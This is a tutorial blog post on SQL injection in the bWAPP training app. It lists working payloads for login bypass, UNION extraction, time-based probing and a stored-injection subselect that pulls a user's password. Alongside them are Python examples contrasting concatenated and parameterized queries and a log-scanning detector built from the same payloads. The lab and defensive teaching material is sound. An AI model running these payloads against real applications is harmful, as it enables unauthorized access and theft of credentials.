SQL Injections – Part 2


As you are already familiar with SQL injection from part 1 of this series, we will dive straight into exploitation with SQLi. Log in to your bWAPP and select the vulnerability SQL Injection (Login Form/Hero). As stated in the previous post, we need to do some manual analysis to understand the functionality and its implementation. Try to log in with some random text (test, test). Now let's go a step further and review the source code of the functionality.

[Image mm1]
The statement is built by concatenating the user input into the query, and that is what leads to the SQLi vulnerability. It is quite easy to break the statement with a single quote and a boolean condition, which is error-based SQLi.
Attack vector: test' or 1=1--

[Image mm2]
You may also try the other types of SQL injection: union based and time based.
Here are the attack examples:
Union Based:
1) test' UNION ALL SELECT NULL,CONCAT(0x3a6a62713a,0x427547556778516a7957,0x3a6e6b6c3a),NULL,NULL#
2) test' union select 1,1,1,1--
3) test' union select 1,'IronMan',1,'You are hacked!'--
4) test' union select 1,'IronMan',1,'alert(document.cookie)Hacked!'--

[Image mm3]

[Image mm4]

Time Based:
1) test' / sleep(15) / '
2) test' AND (SELECT * FROM (SELECT(SLEEP(5)))rGVc) AND 'Wnfm'='Wnfm
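To make the login defect concrete, here is an added example (not code from bWAPP or from this post) that rebuilds the vulnerable login query in Python against an in-memory SQLite table and runs the page's own error-based and union payloads through it, next to the same query written with bound parameters. The table layout (four columns, plain-text passwords), the row contents and the function names are assumptions made for the demo; SQLite treats `--` as a line comment just as MySQL does, but it has no `sleep()`, so the time-based payloads are left out here.

```python
import sqlite3

# Constructed toy copy of the table behind bWAPP's Login Form/Hero page.
# Assumption: four columns, so the four-value UNION payloads on this page line
# up with the SELECT; the real schema and hashing are not shown on the page.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE heroes (id INTEGER, login TEXT, password TEXT, secret TEXT)")
    con.executemany(
        "INSERT INTO heroes VALUES (?, ?, ?, ?)",
        [(1, "neo", "trinity", "blue pill"), (2, "alice", "loveZombies", "cake")],
    )
    return con


def login_vulnerable(con, login: str, password: str) -> list:
    """The defect the page points at: input is concatenated into the statement,
    so quotes and keywords in the input become part of the SQL."""
    sql = ("SELECT id, login, password, secret FROM heroes "
           "WHERE login = '" + login + "' AND password = '" + password + "'")
    return con.execute(sql).fetchall()


def login_parameterized(con, login: str, password: str) -> list:
    """Same query with bound parameters: the driver sends the values separately,
    so they are compared as data and can never change the statement's shape."""
    sql = ("SELECT id, login, password, secret FROM heroes "
           "WHERE login = ? AND password = ?")
    return con.execute(sql, (login, password)).fetchall()


def single_quote_breaks_statement(con, login_fn) -> bool:
    """The manual probe from the page: a lone quote leaves an unterminated
    string, and the resulting database error is the error-based signal."""
    try:
        login_fn(con, "test'", "test")
        return False
    except sqlite3.OperationalError:
        return True


def demo() -> dict:
    con = make_db()
    bypass = "test' or 1=1--"                                       # payload from the page
    union = "test' union select 1,'IronMan',1,'You are hacked!'--"  # payload from the page
    return {
        "valid_vuln": len(login_vulnerable(con, "neo", "trinity")),
        "valid_param": len(login_parameterized(con, "neo", "trinity")),
        "bypass_vuln": len(login_vulnerable(con, bypass, "wrong")),
        "bypass_param": len(login_parameterized(con, bypass, "wrong")),
        "union_vuln": login_vulnerable(con, union, "wrong"),
        "union_param": login_parameterized(con, union, "wrong"),
        "quote_error_vuln": single_quote_breaks_statement(con, login_vulnerable),
        "quote_error_param": single_quote_breaks_statement(con, login_parameterized),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name:>18}: {value}")
```

With the concatenated query, `test' or 1=1--` returns every row (the login succeeds as the first hero) and the union payload returns a row the attacker chose; with bound parameters both strings are simply compared against the login column and nothing matches, and the lone quote produces no error at all, which is why a code review should look for string-built statements rather than for missing input filters.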

Now let's break another functionality: select SQL Injection – Stored (Blog) in bWAPP.
Again, do the analysis and check the source code to understand the implementation.

[Image sb2.png]

Okay, now an INSERT statement is being used, so the malicious input also gets stored in the database. Try inserting a single quote.

[Image sb1]

So try all types of SQL injection here too (error based, union based, time based). If you are tired of doing this manually, use Burp Repeater to resend the request, or ZAP or SQLMap for an automated scan of this request.
Attacks:
1) blah',(select password from heroes where login='neo'))--
2) Yo yo ' / sleep(15) / '
3) Yo yo ' AND (SELECT 3335 FROM(SELECT COUNT(*),CONCAT(0x3a6a62713a,(SELECT (ELT(3335=3335,1))),0x3a6e6b6c3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dIgi'='dIgi
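The stored case differs from the login form in one important way: the injection happens on the write path, and the data it plants is later served by a read path that may be perfectly clean. The following added example (not bWAPP's code) shows that with the page's first attack above. It assumes the blog INSERT takes `(date, entry, owner)`, which is the shape the payload `blah',(select password from heroes where login='neo'))--` is written against; the real column names and the function names are assumptions for the demo.

```python
import sqlite3

# Constructed toy copy of the tables behind bWAPP's SQL Injection - Stored (Blog)
# page. Assumption: the INSERT takes (date, entry, owner); the real schema is
# not shown on the page.
def make_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE heroes (id INTEGER, login TEXT, password TEXT)")
    con.execute("INSERT INTO heroes VALUES (1, 'neo', 'trinity')")
    con.execute("CREATE TABLE blog (id INTEGER PRIMARY KEY, date TEXT, entry TEXT, owner TEXT)")
    return con


def add_entry_vulnerable(con, entry: str, owner: str) -> None:
    """The defect: the entry text is concatenated into the INSERT, so a quote
    closes the string and the rest of the input is executed as SQL."""
    sql = ("INSERT INTO blog (date, entry, owner) VALUES (datetime('now'), '"
           + entry + "', '" + owner + "')")
    con.execute(sql)


def add_entry_parameterized(con, entry: str, owner: str) -> None:
    """Same INSERT with bound parameters: the payload is stored as plain text."""
    con.execute("INSERT INTO blog (date, entry, owner) VALUES (datetime('now'), ?, ?)",
                (entry, owner))


def show_entries(con) -> list:
    """The read path. It uses no user input at all and looks safe on its own,
    which is why reviewing only the SELECTs misses a stored injection."""
    return con.execute("SELECT entry, owner FROM blog ORDER BY id").fetchall()


PAYLOAD = "blah',(select password from heroes where login='neo'))--"  # from the page


def demo() -> dict:
    vuln = make_db()
    add_entry_vulnerable(vuln, PAYLOAD, "bee")
    safe = make_db()
    add_entry_parameterized(safe, PAYLOAD, "bee")
    return {"vulnerable": show_entries(vuln), "parameterized": show_entries(safe)}


if __name__ == "__main__":
    for variant, rows in demo().items():
        print(variant, rows)
```

With concatenation the subselect runs inside the INSERT and neo's password ends up in the `owner` column of a blog row, where the ordinary blog listing displays it to whoever loads the page; with bound parameters the whole payload is just a stored string. The fix is the same as for the login form, parameterise the INSERT, but the review has to cover every statement that takes user input, not only the ones that return data.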

Try all the other functionalities in bWAPP. I hope you now have a good understanding of SQL injections. I'll post a cheat sheet soon. If you think I missed anything, please post a comment below.
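The defender's counterpart to the Burp, ZAP and SQLMap runs above is spotting these payload families in the web server logs. The added example below (not part of the original post) parses combined-format access log lines, URL-decodes each query parameter and matches it against rules written from the payloads listed on this page. The log lines, paths and addresses are constructed for the demo; the payload values inside them are the ones from this page, percent-encoded as a browser would send them. Real bWAPP submits the blog entry by POST, so the body would only be visible in application-level logging; a GET is used here so the example stays self-contained.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Detection rules written from the payload families shown on this page
# (boolean/error-based, UNION, time-based, stored subselect). They run on the
# URL-decoded value of each query parameter, not on the raw line, so that
# percent-encoding and '+' do not hide the keywords.
RULES = {
    "boolean":    re.compile(r"'\s*(?:or|and)\s+[\w'\"]+\s*=\s*[\w'\"]+", re.I),
    "union":      re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "time_delay": re.compile(r"\bsleep\s*\(", re.I),
    "subselect":  re.compile(r"\(\s*select\b", re.I),
    "schema":     re.compile(r"\binformation_schema\b", re.I),
    "comment":    re.compile(r"(?:--|#)\s*$"),   # statement cut short by a comment
}

# Minimal parser for Apache/nginx combined-format access lines.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log: paths and addresses are made up, the parameter values
# are the payloads listed on this page. Line 2 carries a legitimate apostrophe.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jan/2016:10:00:01 +0000] "GET /sqli_login.php?login=neo&password=trinity&form=submit HTTP/1.1" 200 1532',
    '10.0.0.5 - - [10/Jan/2016:10:00:09 +0000] "GET /sqli_login.php?login=o%27brien&password=secret&form=submit HTTP/1.1" 200 1540',
    '203.0.113.7 - - [10/Jan/2016:10:01:13 +0000] "GET /sqli_login.php?login=test%27+or+1%3D1--&password=x&form=submit HTTP/1.1" 200 2210',
    '203.0.113.7 - - [10/Jan/2016:10:01:20 +0000] "GET /sqli_login.php?login=test%27+union+select+1%2C%27IronMan%27%2C1%2C%27You+are+hacked%21%27--&password=x&form=submit HTTP/1.1" 200 2190',
    '203.0.113.7 - - [10/Jan/2016:10:01:41 +0000] "GET /sqli_login.php?login=test%27+AND+%28SELECT+*+FROM+%28SELECT%28SLEEP%285%29%29%29rGVc%29+AND+%27Wnfm%27%3D%27Wnfm&password=x&form=submit HTTP/1.1" 200 1532',
    '203.0.113.7 - - [10/Jan/2016:10:02:05 +0000] "GET /sqli_blog.php?entry=blah%27%2C%28select+password+from+heroes+where+login%3D%27neo%27%29%29--&blog=submit HTTP/1.1" 200 1870',
]


def rules_for_value(value: str) -> set:
    """Names of the rules that match one decoded parameter value."""
    return {name for name, rx in RULES.items() if rx.search(value)}


def scan(lines) -> list:
    """Return (line number, client ip, sorted rule names) for each suspicious request."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        fired = set()
        for _key, value in parse_qsl(urlsplit(m["url"]).query, keep_blank_values=True):
            fired |= rules_for_value(value)
        if fired:
            hits.append((n, m["ip"], sorted(fired)))
    return hits


def hits_per_source(hits) -> dict:
    """Count flagged requests per client address; a burst from one address is
    the usual footprint of the automated tools mentioned above."""
    return dict(Counter(ip for _n, ip, _rules in hits))


if __name__ == "__main__":
    for n, ip, rules in scan(SAMPLE_LOG):
        print(f"line {n}: {ip} -> {', '.join(rules)}")
    print(hits_per_source(scan(SAMPLE_LOG)))
```

The rules key on a quote followed by a boolean operator, on SQL keywords, and on a trailing comment marker rather than on a bare apostrophe, so `o'brien` on line 2 is not flagged while each of the page's payloads trips at least one rule. This is a triage signal, not a substitute for fixing the queries: an attacker can vary keyword casing, spacing and encoding, so the rules will always lag behind.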

Here’s the reference: https://www.owasp.org/index.php/SQL_Injection
How to review the source code: https://www.owasp.org/index.php/Reviewing_Code_for_SQL_Injection
